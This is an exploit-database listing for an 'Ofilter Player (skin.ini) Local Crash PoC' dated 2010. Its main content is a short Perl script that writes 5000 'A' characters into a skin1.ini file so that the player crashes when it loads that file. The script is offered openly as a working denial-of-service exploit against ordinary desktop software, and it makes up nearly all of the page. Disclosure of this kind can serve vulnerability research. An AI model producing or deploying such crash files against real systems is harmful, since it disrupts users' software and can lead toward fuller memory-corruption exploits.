[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ofilter Player (skin.ini) Local Crash PoC

Author
Rehan Ahmed
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10074
Category
dos / poc
Date add
13-01-2010
Platform
unsorted
=========================================
Ofilter Player (skin.ini) Local Crash PoC
=========================================

#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
 
my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";



#  0day.today [2024-11-16]  #